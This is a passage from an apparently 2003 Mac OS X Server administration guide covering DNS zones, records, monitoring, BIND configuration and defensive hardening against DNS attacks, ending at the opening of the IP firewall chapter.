4 Select or deselect Allow Recursion as needed.
If you choose to enable recursion, consider disabling it for external IP addresses, but
enabling it for LAN IP addresses, by editing BIND’s named.conf file. See BIND’s
documentation for more information.
Managing Zones
Zones are the basic organizational unit of the Domain Name System. Zones contain
records and are defined by how they acquire those records, and how they respond to
DNS requests. There are three kinds of zones:
Master
A master zone has the master copy of the zone’s records, and provides authoritative
answers to lookup requests.
Slave
A slave zone is a copy of a master zone stored on a slave or secondary name server.
Each slave zone keeps a list of masters that it contacts to receive updates to records in
the master zone. Slaves must be configured to request the copy of the master zone’s
data. Slave zones use zone transfers to get copies of the master zone data. Slave name
servers can take lookup requests like master servers. By using several slave zones linked
to one master, you can distribute DNS query loads across several computers and ensure
lookup requests are answered when the master name server is down.
Slave zones also have a refresh interval also. It determines how often slave zones check
for changes from the master zone. You can change the zone refresh interval by using
BIND’s configuration file. See BIND’s documentation for more information.
Forward
A forward zone directs all lookup requests for that zone to other DNS servers. Forward
zones don’t do zone transfers. Often, forward zone servers are used to provide DNS
services to a private network behind a firewall. In this case, the DNS server must have
access to the Internet and a DNS server outside the firewall.
Adding a Master Zone
A master zone has the master copy of the zone’s records and provides authoritative
answers to lookup requests. After adding a master zone, Server Admin automatically
creates an NS record with the same name as the Source of Authority (SOA).
LL2351.Book Page 22 Monday, September 8, 2003 2:47 PM
Chapter 2 DNS Service
23
To add a master zone:
1 In Server Admin, choose DNS in the Computer & Services list.
2 Click Settings.
3 Select the Zones tab.
4 Click Add beneath the Zones list.
5 Enter a zone name.
The zone name must have a trailing period: “example.com.”
6 Choose Master from the Zone Type pop-up menu.
7 Enter the hostname of the domain’s SOA.
If this computer will be the authoritative name server for the domain, enter the
computer’s hostname (with a trailing period). For example, “ns.example.com.”
8 Enter the email address of the zone’s administrator.
The email address must not have an “@”, but a period; it should also have a trailing
period. For example, the email address “[email protected]” should be entered as
“admin.example.com.” (Remember to leave the trailing period.)
9 Click OK and then click Save.
Adding a Slave Zone
A slave zone is a copy of a master zone stored on a slave or secondary name server.
Slaves must be configured to request the copy of the master zone’s data. Slave zones
use zone transfers to get copies of the master zone data.
To add a slave zone:
1 In Server Admin, choose DNS in the Computer & Services list.
2 Click Settings.
3 Select the Zones tab.
4 Click Add beneath the Zones list.
5 Enter a zone name.
The Zone name must have a trailing period: “example.com.”
6 Choose Slave from the Zone Type pop-up menu.
7 Click OK.
8 Click Add under the “Master servers for backup” pane.
9 Enter the IP addresses for the master servers for this zone.
10 Click Save.
LL2351.Book Page 23 Monday, September 8, 2003 2:47 PM
24
Chapter 2 DNS Service
Adding a Forward Zone
A forward zone directs all lookup requests to other DNS servers.
To add a forward zone:
1 In Server Admin, choose DNS in the Computer & Services list.
2 Click Settings.
3 Select the Zones tab.
4 Click Add beneath the Zones list.
5 Enter a zone name.
The Zone name must have a trailing period: “example.com.”
6 Choose the Forward zone type from the Zone Type pop-up menu.
7 Click OK.
8 Click Add under the “Forward servers for fwd” pane.
9 Enter the IP addresses for the master servers for this zone.
10 Click Save.
Duplicating a Zone
You can create a copy of an existing zone on the same computer. You could use this to
speed up configuration of multiple zones.
To duplicate a zone:
1 In Server Admin, choose DNS in the Computer & Services list.
2 Click Settings.
3 Select the Zones tab.
4 Click the Duplicate button beneath the Zones list.
5 If desired, double-click the newly duplicated zone to change the zone name, SOA or
administrator email address.
6 Click Save.
LL2351.Book Page 24 Monday, September 8, 2003 2:47 PM
Chapter 2 DNS Service
25
Modifying a Zone
This section describes modifying a zone’s type and settings but not modifying the
records within a zone. You may need to change a zone’s administrator address, type, or
domain name.
To modify a zone:
1 In Server Admin, choose DNS in the Computer & Services list.
2 Click Settings.
3 Select the Zones tab.
4 Click the Edit button beneath the Zones list.
5 Change the zone name, type, or administrator email address as needed.
For more information on zone types, see “Managing Zones” on page 22.
6 Click OK, and click Save.
Deleting a Zone
The section describes how to delete an existing zone. This deletes the zone and all the
records associated with it.
To delete a zone:
1 In Server Admin, choose DNS in the Computer & Services list.
2 Click Settings.
3 Select the Zones tab.
4 Click the Delete button beneath the Zones list.
5 Click Save to confirm the deletion.
Managing Records
Each zone contains a number of records. These records are requested when a client
computer needs to translate a domain name (like www.example.com) to an IP number.
Web browsers, email clients, and other network applications rely on a zone’s records to
contact the appropriate server.
The master zone’s records will be queried by others across the Internet so they can
connect to your network services. There are several kinds of DNS records. The records
which are available for configuration by Server Admin’s user interface are:
• Address (A): Stores the IP address associated with a domain name.
• Canonical Name (CNAME): Stores the “real name” of a server when given a “nickname”
or alias. For example, mail.apple.com might have a canonical name of
MailSrv473.apple.com.
• Mail Exchanger (MX): Stores the domain name of the computer that is used for email
in a zone.
LL2351.Book Page 25 Monday, September 8, 2003 2:47 PM
26
Chapter 2 DNS Service
• Name Server (NS): Stores the authoritative name server for a given zone.
• Pointer (PTR): Stores the domain name of a given IP address (reverse lookup).
• Text (TXT): Stores a text string as a response to a DNS query.
If you need access to other kinds of records, you’ll need to edit BIND’s configuration
files manually. Please see BIND’s documentation for details.
Adding a Record to a Zone
You need to add records for each domain name (example.com) and subdomain name
(machine.example.com) for which the DNS master zone has responsibility. You should
not add records for domain names that this zone doesn’t control.
To add a record:
1 In Server Admin, choose DNS in the Computer & Services list.
2 Click Settings.
3 Select the Zones tab.
4 Select the Zone to which this record will be added.
5 Click the Add button beneath the Records list.
6 Select a record type from the Type pop-up menu.
7 In the first field, enter the fully qualified domain name.
The domain name must have a trailing period: “example.com.”
If you’re creating a PTR record, enter the IP address instead.
If you’re creating a TXT record, enter the text string you want.
8 In the second field, for the following record types, enter:
• A records: the IP address.
• AAAA records: the IPv6 address.
• C-NAME records: the real name of the computer.
• MX records: the name (with trailing period) or IP address of the domain’s mail
exchanger.
• PTR records: the full domain name with trailing period.
9 If creating an A record, select “Create reverse mapping record” to automatically create
its corresponding PTR record.
10 Click OK, and click Save.
LL2351.Book Page 26 Monday, September 8, 2003 2:47 PM
Chapter 2 DNS Service
27
Modifying a Record in a Zone
If you make frequent changes to the namespace for the domain, you’ll need to update
the DNS records as often as that namespace changes. Upgrading hardware or adding
to a domain name might require updating the DNS records as well.
To modify a record:
1 In Server Admin, choose DNS in the Computer & Services list.
2 Click Settings.
3 Select the Zones tab.
4 Select the Zone in which this record will be modified.
5 Double-click the record to be modified, or select the record and click the Edit button.
6 Modify the record as needed.
You can change the hostname, record type, or IP number.
7 Click OK.
Deleting a Record From a Zone
You should delete records whenever a domain name is no longer associated with a
working address.
To delete a record:
1 In Server Admin, choose DNS in the Computer & Services list.
2 Click Settings.
3 Select the Zones tab.
4 Select the zone from which this record will be deleted.
5 Select the record to be deleted.
6 Click the Delete button beneath the Records list.
7 Click Save to confirm the deletion.
LL2351.Book Page 27 Monday, September 8, 2003 2:47 PM
28
Chapter 2 DNS Service
Monitoring DNS
You may want to monitor DNS status to troubleshoot name resolution problems, check
how often the DNS service is used, or even check for unauthorized or malicious DNS
service use. This section discusses common monitoring tasks for DNS service.
Viewing DNS Service Status
You can check the DNS Status window to see:
• Whether the service is running.
• The version of BIND (the underlying software for DNS) that is running.
• When the service was started and stopped.
• The number of zones allocated.
To view DNS service status:
1 In Server Admin, choose DNS in the Computer & Services list.
2 Click the Overview button for general DNS service information.
Viewing DNS Service Activity
You can check the DNS Status window to see:
• The number of transfers running and deferred.
• Whether the service is loading the configuration file.
• If the service is priming.
• Whether query logging is turned on or off.
• The number of Start of Authority (SOA) queries in progress.
To view DNS service activity:
1 In Server Admin, choose DNS in the Computer & Services list.
2 Click Activity to view operations currently in progress.
Viewing DNS Log Entries
DNS service creates entries in the system log for error and alert messages.
To see DNS log entries:
1 In Server Admin, choose DNS in the Computer & Services list.
2 Click Log.
Changing DNS Log Detail Levels
You can change the detail level of the DNS service log. You may want a highly detailed
log for debugging, or a less detailed log that only shows critical warnings.
LL2351.Book Page 28 Monday, September 8, 2003 2:47 PM
Chapter 2 DNS Service
29
To change the log detail level:
1 In Server Admin, choose DNS in the Computer & Services list.
2 Click Settings.
3 Select the Logging tab.
4 Choose the detail level from the Log Level pop-up menu.
The possible log levels are:
• Critical (less detailed)
• Error
• Warning
• Notice
• Information
• Debug (most detailed)
Changing DNS Log File Location
You can change the location of the DNS service log. You may want to put it somewhere
other than the default path.
To change the log detail level:
1 In Server Admin, choose DNS in the Computer & Services list.
2 Click Settings.
3 Select the Logging tab.
4 Enter the desired path for the file path for the DNS service log, or select a path using
the Browse button.
If no path is entered, the default location is /var/logs/.
Viewing DNS Usage Statistics
You can check the DNS Statistics window to see statistics on common DNS queries.
Some common DNS queries begin with the following:
• Name Server (NS): Asks for the authoritative name server for a given zone.
• Address (A): Asks for the IP address associated with a domain name.
• Canonical Name (CName): Asks for the “real name” of a server when given a
“nickname” or alias. For example, mail.apple.com might have a canonical name of
MailSrv473.apple.com.
• Pointer (PTR): Asks for the domain name of a given IP address (reverse lookup).
• Mail Exchanger (MX): Asks which computer in a zone is used for email.
• Start Of Authority (SOA): Asks for name server information shared with other name
servers and possibly the email address of the technical contact for this name server.
• Text (TXT): Asks for text records used by the administrator.
LL2351.Book Page 29 Monday, September 8, 2003 2:47 PM
30
Chapter 2 DNS Service
To see DNS usage statistics:
1 In Server Admin, choose DNS in the Computer & Services list.
2 Click Activity to view operations currently in progress and usage statistics.
Securing the DNS Server
DNS servers are targeted by malicious computer users (commonly called “hackers”) in
addition to other legitimate Internet servers. There are several kinds of attacks that DNS
servers are susceptible to. By taking extra precautions, you can prevent the problems
and downtime associated with malicious users. There are several kinds of security hacks
associated with DNS service. They’re:
• DNS Spoofing.
• Server Mining.
• DNS Service Profiling.
• Denial-of-Service (DoS).
• Service Piggybacking.
DNS Spoofing
DNS spoofing is adding false data into the DNS Server’s cache. This allows hackers to do
any of the following:
• Redirect real domain name queries to alternative IP Addresses.
For example, a falsified A record for a bank could point a computer user’s browser to
a different IP address that is controlled by the hacker. A duplicate website could fool
him or her into giving their bank account numbers and passwords to the hacker
unintentionally.
Also, a falsified mail record could allow a hacker to intercept mail sent to or from a
domain. If the hacker also forwards those emails to the correct mail server after
copying them, this can go undetected indefinitely.
• Prevent proper domain name resolution and access to the Internet.
This is the most benign of DNS spoof attacks. It merely makes a DNS server appear to
be malfunctioning.
The most effective method to guard against these attacks is vigilance. This includes
maintaining up-to-date software as well as auditing your DNS records regularly. As
exploits are found in the current version of BIND, the exploit is patched and a Security
Update is made available for Mac OS X Server. Apply all such security patches. Regular
audits of your DNS records is also valuable to prevent these attacks.
Server Mining
Server mining is the practice of getting a copy of a complete master zone by
requesting a zone transfer. In this case, a hacker pretends to be a slave zone to another
master zone and requests a copy of all of the master zone’s records.
LL2351.Book Page 30 Monday, September 8, 2003 2:47 PM
Chapter 2 DNS Service
31
With a copy of your master zone, the hacker can see what kinds of services a domain
offers, and the IP address of the servers that offer them. He or she can then try specific
attacks based on those services. This is reconnaissance before another attack.
To defend against this attack, you need to specify which IP addresses are allowed to
request zone transfers (your slave zone servers) and disallow all others. Zone transfers
are accomplished over TCP on port 53. The method of limiting zone transfers is
blocking zone transfer requests from anyone but your slave DNS servers.
To specify zone transfer IP addresses:
m Create a firewall filter that allows only IP addresses inside your firewall to access TCP
port 53.
Follow the instructions in “Creating an Advanced IP Filter for TCP ports” in Chapter 3, “IP
Firewall Service.” Use the following settings:
• Allow packet.
• Port 53.
• TCP protocol.
• Source IP is the IP address of your slave DNS server.
• Destination IP is the IP address of your master DNS server.
DNS Service Profiling
Another common reconnaissance technique used by malicious users is to profile your
DNS Service. First a hacker makes a BIND version request. The server will report what
version of BIND is running. He or she then compares the response to known exploits
and vulnerabilities for that version of BIND.
To defend against this attack, you can configure BIND to respond with something other
than what it is.
To alter BIND’s version response:
1 Launch a command-line text editor (like vi, emacs, or pico).
2 Open named.conf for editing.
3 Add the following to the “options” brackets of the configuration file.
version "[your text, maybe ‘we're not telling!’]";
4 Save the config file.
Denial-of-Service (DoS)
This kind of attack is very common and easy to do. A hacker sends so many service
requests and queries that a server uses all of its processing power and network
bandwidth to try and respond. The hacker prevents legitimate use of the service by
overloading it.
LL2351.Book Page 31 Monday, September 8, 2003 2:47 PM
32
Chapter 2 DNS Service
It is difficult to prevent this type of attack before it begins. Constant monitoring of the
DNS service and server load allows an administrator to catch the attack early and
mitigate its damaging effect.
The easiest way to guard against this attack is to block the offending IP address with
your firewall. See “Creating an Advanced IP Filter for TCP ports” on page 51.
Unfortunately, this means the attack is already underway and the hacker’s queries are
being answered and the activity logged.
Service Piggybacking
This attack is not often done by hackers, but common Internet users. They may feel that
their DNS response time with their own Internet Service Provider is too slow. They learn
this trick from other users. The Internet users will configure their computer to query
another DNS server instead of their own ISP’s DNS servers. Effectively, there will be
more users accessing the DNS server than have been planned for.
You can guard against this by limiting or disabling DNS Recursion. If you plan to offer
DNS service to your own LAN users, they need recursion to resolve domain names, but
you don’t want to provide this service to any Internet users.
To prevent recursion entirely, see “Enabling or Disabling Recursion” on page 21.
The most common balance is allowing recursion for requests coming from IP addresses
within your own range, but denying recursion to external addresses. BIND allows you to
specify this in its configuration file, named.conf. Edit your named.conf file to include the
following:
options {
...
allow-recursion{
127.0.0.0/8;
[your internal IP range of addresses, like 192.168.1.0/27];
};
};
Please see BIND’s documentation for further information.
LL2351.Book Page 32 Monday, September 8, 2003 2:47 PM
Chapter 2 DNS Service
33
Common Network Administration Tasks That Use
DNS Service
The following sections illustrate some common network administration tasks that
require DNS service.
Setting Up MX Records
If you plan to provide mail service on your network, you must set up DNS so that
incoming mail is sent to the appropriate mail host on your network. When you set up
mail service, you define a series of hosts, known as mail exchangers or MX hosts, with
different priorities. The host with the highest priority gets the mail first. If that host is
unavailable, the host with the next highest priority gets the mail, and so on.
For example, let’s say the mail server’s host name is “reliable” in the “example.com”
domain. Without an MX record, the users’ mail addresses would include the name of
your mail server computer, like this:
[email protected]
If you want to change the mail server or redirect mail, you must notify potential
senders of a new address for your users. Or, you can create an MX record for each
domain that you want handled by your mail server and direct the mail to the correct
computer.
When you set up an MX record, you should include a list of all possible computers that
can receive mail for a domain. That way, if the server is busy or down, mail is sent to
another computer. Each computer on the list is assigned a priority number. The one
with the lowest number is tried first. If that computer isn’t available, the computer with
the next lowest number is tried, and so on. When a computer is available, it holds the
mail and sends it to the main mail server when the main server becomes available, and
then the server delivers the mail. A sample list might look like this:
example.com
10 reliable.example.com
20 our-backup.example.com
30 last-resort.example.com
MX records are used for outgoing mail, too. When your mail server sends mail, it looks
at the MX records to see whether the destination is local or somewhere else on the
Internet. Then the same process happens in reverse. If the main server at the
destination is not available, your mail server tries every available computer on that
destination’s MX record list, until it finds one that will accept the mail.
Note: If you don’t enter the MX information into your DNS server correctly, mail won’t
work.
LL2351.Book Page 33 Monday, September 8, 2003 2:47 PM
34
Chapter 2 DNS Service
Configuring DNS for Mail Service
Configuring DNS for mail service is enabling Mail Exchange (MX) records with your own
DNS server. If you have an Internet Service Provider (ISP) that provides you with DNS
service, you’ll need to contact the ISP so that they can enable your MX records. Only
follow these steps if you provide your own DNS Service.
To enable MX records:
1 In Server Admin, choose DNS in the Computers & Services list.
2 Click Settings.
3 Select the Zones tab.
4 Select the Zone you want to use.
5 Click the Add button under the Records pane.
6 Choose MX from the Type pop-up menu.
7 Enter the domain name (like “example.com.”) in the From field.
8 Enter the name of the mail server (like “mail.example.com.”) in the To field.
9 Enter a precendence number.
10 Click OK.
Enabling Redundant Mail Servers
You may need to set up multiple servers for redundancy. If this is the case, you’ll need
to add additional information to each MX record. Create one record for each auxiliary
server. This consists of two steps:
These instructions assume you have an existing MX record for a primary mail server. If
not, please see “Configuring DNS for Mail Service” on page 34.
Step 1: Edit the MX record of the primary mail server
1 In Server Admin, choose DNS in the Computers & Services list.
2 Click Settings.
3 Select the Zones tab.
4 Select the Zone you want to use.
5 Click the primary mail server’s MX record in the Records pane.
6 Click the Edit button below the Records pane.
7 Enter a low precedence number for that server.
A lower number indicates it will be chosen first, if available, to receive mail.
8 Click OK.
9 Proceed to Step 2.
LL2351.Book Page 34 Monday, September 8, 2003 2:47 PM
Chapter 2 DNS Service
35
Step 2: Create records and priorities for the auxiliary mail servers
These instruction assume you have edited the original MX record. If not, please do so
before proceeding.
These instructions also assume you have already set up and configured one or more
auxiliary mail servers.
To enable backup or redundant mail servers:
1 In Server Admin, select DNS in the Computers & Services pane.
2 Click Settings.
3 Select the Zones tab.
4 Select the Zone you want to use.
5 Click the Add button under the Records pane.
6 Choose MX from the Type pop-up menu.
7 Enter the domain name (like ‘example.com.’) in the From field.
8 Enter the name of the mail server (like ‘backup.example.com.’) in the To field.
9 Enter a precedence number for that server which is higher than that of the primary
server.
A higher the number indicates it will be chosen if the primary server is unavailable.
10 Click OK.
Setting Up Namespace Behind a NAT Router
If you’re behind a Network Address Translation (NAT) router, you have a special set of IP
addresses that are only usable within the NAT environment. If you were to assign a
domain name to these addresses outside of the NAT router, none of your domain
names would resolve to the correct computer. See Chapter 4, “NAT Service,” on page 67
for more information about NAT.
You can, however, run a DNS service behind the router, assigning host names to the
NAT IP addresses. This way, if you’re behind the NAT router, you can enter domain
names rather than IP addresses to access servers, services, and workstations. Your DNS
server should also have a Forwarding zone to send DNS requests outside of the NAT
router to allow resolution of names outside the routed area. Your clients’ networking
settings should specify the DNS server behind the NAT router. The process of setting up
one of these networks is the same as setting up a private network. See “Setting Up a
Private TCP/IP Network” on page 36 for more information.
If you choose to do this, names entered by users outside the NAT router won’t resolve
to the addresses behind it. You should set the DNS records outside the NAT-routed area
to point to the NAT router, and use NAT port forwarding to access computers behind
the NAT router. For more information on port forwarding, see Chapter 4, “NAT Service,”
on page 67.
LL2351.Book Page 35 Monday, September 8, 2003 2:47 PM
36
Chapter 2 DNS Service
Mac OS X’s Rendezvous feature allows you to use hostnames on your local subnet that
end with the “.local” suffix without having to enable DNS. Any service or device that
supports Rendezvous allows the use of user-defined namespace on your local subnet
without setting up and configuring DNS.
Network Load Distribution (aka Round Robin)
BIND allows for simple load distribution using an address-shuffling method called
round robin. You set up a pool of IP addresses for several hosts mirroring the same
content, and BIND cycles the order of these addresses as it responds to queries. Round
robin has no capability to monitor current server load or processing power. It simply
cycles the order of an address list for a given host name.
You enable round robin by adding multiple address entries in your zone data file for a
given host. For example, suppose you want to distribute web server traffic between
three servers on your network that all mirror the same content. Suppose the servers
have the IP addresses 192.168.12.12, 192.168.12.13, and 192.168.12.14. You would add these
lines to the zone data file db.example.com:
www.example.com
60
IN
A
192.168.12.12
www.example.com
60
IN
A
192.168.12.13
www.example.com
60
IN
A
192.168.12.14
When BIND encounters multiple entries for one host, its default behavior is to answer
queries by sending out this list in a cycled order. The first request gets the addresses in
the order A, B, C. The next request gets the order B, C, A, then C, A, B, and so on. Notice
that the time-to-live (TTL) in the second column is set quite short to mitigate the effects
of local caching.
Setting Up a Private TCP/IP Network
If you have a local area network that has a connection to the Internet, you must set up
your server and client computers with IP addresses and other information that’s unique
to the Internet. You obtain IP addresses from your Internet service provider (ISP).
If it’s unlikely that your local area network will ever be connected to the Internet and
you want to use TCP/IP as the protocol for transmitting information on your network,
it’s possible to set up a “private” TCP/IP network. When you set up a private network,
you choose IP addresses from the blocks of IP addresses that the IANA (Internet
Assigned Numbers Authority) has reserved for private intranets:
• 10.0.0.0–10.255.255.255 (10/8 prefix)
• 172.16.0.0–172.31.255.255 (172.16/12 prefix)
• 192.168.0.0–192.168.255.255 (192.168/16 prefix)
LL2351.Book Page 36 Monday, September 8, 2003 2:47 PM
Chapter 2 DNS Service
37
If you set up a private TCP/IP network, you can also provide DNS service. By setting up
TCP/IP and DNS on your local area network, your users will be able to easily access file,
web, mail, and other services on your network.
Hosting Several Internet Services With a Single IP Address
You must have one server supplying all your Internet services (like mail, web). They may
all be running on one computer with a single IP address. For example, you may want to
have the domain name www.example.com resolve to the same IP address as
ftp.example.com, or mail.example.com.
Setting up the DNS records for this service is easy. You’ll still need a full set of DNS
records, one for each name you want to resolve.
• Set up MX records for mail, so mail.example.com resolves to your server’s IP address.
• Set up A records for each service your server provides, so web.example.com resolves
to your server’s IP address.
• Do the same for each service you provide (ftp.apple.com, or fileshare.apple.com, or
whatever).
As your needs grow, you can add other computers to the network to take over these
services. Then all you have to do is update the DNS record, and your client’s settings
can remain the same.
Configuring BIND Using the Command Line
In order to set up and use DNS service on Mac OS X Server you may wish to configure
BIND with the command-line. Configuring BIND requires making changes to UNIX
configuration files in the Terminal application. To configure BIND, you must be
comfortable with typing UNIX commands and using a UNIX text editor. Only
manipulate these settings if you have a thorough understanding of DNS and BIND,
preferably as an experienced DNS administrator.
What Is BIND?
BIND stands for Berkeley Internet Name Domain. BIND runs on UNIX-based operating
systems and is distributed as open-source software. BIND is used on the majority of
name servers on the Internet today.
Important: If you think you might want to connect to the Internet in the future, you
should register with an Internet registry and use the IP addresses provided by the
registry when setting up your private network. Otherwise, when you do connect to
the Internet, you’ll need to reconfigure every computer on your network.
Warning: Incorrect BIND configurations can result in serious network problems.
LL2351.Book Page 37 Monday, September 8, 2003 2:47 PM
38
Chapter 2 DNS Service
BIND is configured by editing text files containing information about how you want
BIND to behave and information about the servers on your network. If you wish to
learn more about DNS and BIND, resources are listed at the end of this chapter.
BIND on Mac OS X Server
Mac OS X Server uses BIND version 9.2.2. You can start and stop DNS service on
Mac OS X Server using the Server Admin application. You can use Server Admin to view
DNS status and usage statistics.
BIND Configuration File
By default, BIND looks for a configuration file labeled “named.conf” in the /etc directory.
This file contains commands you can use to configure BIND’s many options. It also
specifies the directory to use for zone data files.
Zone Data Files
Zone data files consist of paired address files and reverse lookup files. Address records
link host names (host1.example.com) to IP addresses. Reverse lookup records do the
opposite, linking IP addresses to host names. Address record files are named after your
domain name– for example, example.com. Reverse lookup file names look like part of
an IP address, such as db.192.168.12.
By default, the zone data files are located in /var/named/.
Practical Example
The following example allows you to create a basic DNS configuration using BIND for a
typical network behind a Network Address Translation (NAT) device that connects to an
ISP. The port (cable modem/DSL/dial-up/etc.) that is connected to your ISP is referred to
here as the WAN interface. The port that is connected to your internal network is
referred to here as the LAN interface. The sample files you need are installed with
Mac OS X Server in the directories listed in the steps below. This example also assumes
the following:
• The IP address of the WAN interface is determined by your ISP.
• The IP address of the LAN interface is 10.0.1.1.
• The IP address of the Mac OS X or Mac OS X Server computer that will be used as the
DNS server is 10.0.1.2.
• The IP addresses for client computers are 10.0.1.3 through 10.0.1.254.
If IP address assignment is provided by the NAT device via DHCP, it must be configured
with the above information. Please consult your router or gateway manual for
instructions on configuring its DHCP server.
If your NAT device connects to the Internet, you also need to know the DNS server
addresses provided by your ISP.
LL2351.Book Page 38 Monday, September 8, 2003 2:47 PM
Chapter 2 DNS Service
39
Setting Up Sample Configuration Files
The sample files can be found in /usr/share/named/examples.
The sample files assume a domain name of example.com behind the NAT. This may be
changed, but must be changed in all modified configuration files. This includes
renaming /var/named/example.com.zone to the given domain name, for example, /var/
named/foo.org.zone
To set up the sample files:
1 In Terminal, log in as root.
2 Enter the following command:
cp /etc/named.conf /etc/named.conf.OLD
This saves a copy of the process configuration file.
3 Then, enter the following command:
cp /usr/share/named/examples/db.10.0.1.sample /var/named/10.0.1.zone
This copies the sample file for the NAT zone.
4 Enter the following command:
cp /usr/share/named/examples/example.com.sample /var/named/
example.com.zone
This copies the sample file for your domain.
5 Now, enter the following command:
cp /usr/share/named/examples/named.conf.sample /etc/named.conf
This copies in a sample named process configuration file.
6 Using a command-line text editor (like pico, or emacs), open /etc/named.conf for
editing.
7 Follow the instructions in the sample file to apply edits appropriate to your specific
installation.
8 Save your changes to named.conf.
9 Use Server Admin to start DNS service.
10 In the Network pane of System Preferences, change the domain name servers to list
only the IP address of the new DNS server, 10.0.1.2.
Configuring Clients
If the IP addresses of your client computers are statically assigned, change the domain
name servers of their Network preference panes to only list the new server’s IP address,
10.0.1.2.
LL2351.Book Page 39 Monday, September 8, 2003 2:47 PM
40
Chapter 2 DNS Service
If you are using Mac OS X Server as your DHCP Server:
1 In Server Settings, click the Network tab, click DHCP/NetBoot, and choose Configure
DHCP/NetBoot.
2 On the Subnet tab, select the subnet on the built-in Ethernet port and click Edit.
3 In the General tab, enter the following information:
Start: 10.0.1.3
End: 10.0.1.254
Subnet Mask: 255.255.255.0
Router: 10.0.1.1
4 Click the DNS tab and enter the following information:
Default Domain: example.com
DNS Servers: 10.0.1.2
5 Click the Save button and log out of Server Settings.
Note: The client computers may not immediately populate with the new IP
configuration information. This will depend upon when their DHCP leases expire. It may
be necessary to restart the client computers for the changes to populate.
Check Your Configuration
To verify the steps were successful, open Terminal, located in /Applications/Utilities and
enter the following commands (substituting the local domain name for
“server.example.com” as appropriate):
dig server.example.com
dig -x 10.0.1.2
Note: If this generic configuration example does not meet your needs, Apple
recommends that you don’t attempt to configure DNS on your own and that you seek
out a professional consultant or additional documentation.
Using DNS With Dynamically Assigned IP Addresses
Dynamic DNS is a mechanism that lets you modify the IP address/domain name list
without directing the name server to reload the edited list. This means you can update
the name server remotely and easily modify DNS data.
You can use dynamic DNS with DHCP service. DHCP assigns each client computer a
dynamic IP address when the computer starts up. Because a DHCP server may assign IP
addresses randomly, it can be useful to assign meaningful DNS names to these
addresses on the fly.
LL2351.Book Page 40 Monday, September 8, 2003 2:47 PM
Chapter 2 DNS Service
41
For instance, if “Bob” walks into work in the morning and starts up his computer, and
the DHCP server assigns his computer a dynamic IP address, a DNS entry
“bob.example.com” can be associated with that IP address. Even though Bob’s IP
address may change every time he starts up his computer, his DNS name remains the
same. This lets users communicate with Bob’s computer without knowing the IP
address.
You can also use dynamic DNS to provide static host names for users who connect to
the Internet through a modem. An ISP can set up dynamic DNS so a home computer
has the same host name every time it connects.
Where to Find More Information
For more information on DNS and BIND, see the following:
• DNS and BIND, 4th edition, by Paul Albitz and Cricket Liu (O’Reilly and Associates,
2001)
• The International Software Consortium website:
www.isc.org and www.isc.org/products/BIND/
• The DNS Resources Directory:
www.dns.net/dnsrd/
Request For Comment Documents
Request for Comments (RFC) documents provide an overview of a protocol or service
and details about how the protocol should behave. If you’re a novice server
administrator, you’ll probably find some of the background information in an RFC
helpful. If you’re an experienced server administrator, you can find all the technical
details about a protocol in its RFC document. You can search for RFC documents by
number at the website www.faqs.org/rfcs.
• A, PTR, CNAME, MX -For more information, see RFC 1035
• AAAA- For more information, see RFC 1886.
LL2351.Book Page 41 Monday, September 8, 2003 2:47 PM
LL2351.Book Page 42 Monday, September 8, 2003 2:47 PM
3
43
3 IP Firewall Service
Firewall service is software that protects the network applications running on your
Mac OS X Server. Turning on firewall service is similar to erecting a wall to limit access.
Firewall service scans incoming IP packets and rejects or accepts these packets based
on the set of filters you create. You can restrict access to any IP service running on the
server, and you can customize filters for all incoming clients or for a range of client IP
addresses.
The illustration below shows an example firewall process.
Is there a filter
for port 80?
Locate the
Any Port filter
with the most
specific range
that includes
the address
10.221.41.33.
A computer with IP
address 10.221.41.33
attempts to connect to
the server over the
Internet (port 80).
The server begins
looking for filters.
Is there a filter
containing
IP address
10.221.41.33?
Yes
Connection
is refused.
Yes
What does the
filter specify?
Connection
is made.
Allow
No
Deny
LL2351.Book Page 43 Monday, September 8, 2003 2:47 PM
44
Chapter 3 IP Firewall Service
Services such as Web and FTP are identified on your server by a Transmission Control
Protocol (TCP) or User Datagram Protocol (UDP) port number. When a computer tries to
connect to a service, firewall service scans the filter list for a matching port number.
• If the port number is in the filter list, the filter applied is the one that contains the
most specific address range.
• If the port number is not in the list, the Default filter that contains the most specific
address range is used.
The port filters you create are applied to TCP packets and can also be applied to UDP
packets. In addition, you can set up filters for restricting Internet Control Message
Protocol (ICMP), Internet Group Management Protocol (IGMP), and NetInfo data.
If you plan to share data over the Internet, and you don’t have a dedicated router or
firewall to protect your data from unauthorized access, you should use firewall service.
This service works well for small to medium businesses, schools, and small or home
offices.
Large organizations with a firewall can use firewall service to exercise a finer degree of
control over their servers. For example, individual workgroups within a large business,
or schools within a school system, may want to use firewall service to control access to
their own servers.
IP Firewall also provides stateful packet inspection which determines whether an
incoming packet is a legitimate response to an outgoing request or part of an ongoing
session, allowing packets that would otherwise be denied.
Mac OS X Server uses the application ipfw for firewall service.
Important: When you start firewall service the first time, most all incoming TCP
packets are denied until you change the filters to allow access. By default, only the
ports essential to remote administration are available. These include access by
Remote Directory Access (625), Server Administration via Server Admin (687), and
Secure Shell (22). For any other network service, you must create filters to allow
access to your server. If you turn firewall service off, all addresses are allowed access
to your server.
LL2351.Book Page 44 Monday, September 8, 2003 2:47 PM
Chapter 3 IP Firewall Service
45
Understanding Firewall Filters
When you start firewall service, the default configuration denies access to all incoming
packets from remote computers except ports for remote configuration. This provides a
high level of security. You can then add new IP filters to allow server access to those
clients who require access to services.
To learn how IP filters work, read the following section. To learn how to create IP filters,
see “Managing Firewall Service” on page 49.
What is a Filter?
A filter is made up of an IP address and a subnet mask, and sometimes a port number
and access type. The IP address and the subnet mask together determine the range of
IP addresses to which the filter applies, and can be set to apply to all addresses.
IP Address
IP addresses consist of four segments with values between 0 and 255 (the range of an 8
bit number), separated by dots (for example, 192.168.12.12). The segments in IP
addresses go from general to specific (for example, the first segment might belong to
all the computers in a whole company, and the last segment might belong to a specific
computer on one floor of a building).
Subnet Mask
A subnet mask indicates which segments in the specified IP address can vary on a
given network and by how much. The subnet mask is given in Classless Inter Domain
Routing (CIDR) notation. It consists of the IP address followed by a slash (/) and a
number from 1 to 32, called the IP prefix. An IP prefix identifies the number of
significant bits used to identify a network.
For example, 192.168.2.1 /16 means the first 16 bits (the first two numbers separated by
periods) are used to represent the network (every machine on the network begins with
192.168) and the remaining 16 bits (the last two numbers separated by periods) are
used to identify hosts (each machine has a unique set of trailing numbers).
LL2351.Book Page 45 Monday, September 8, 2003 2:47 PM
46
Chapter 3 IP Firewall Service
Addresses with subnet masks in CIDR notation correspond to address notation
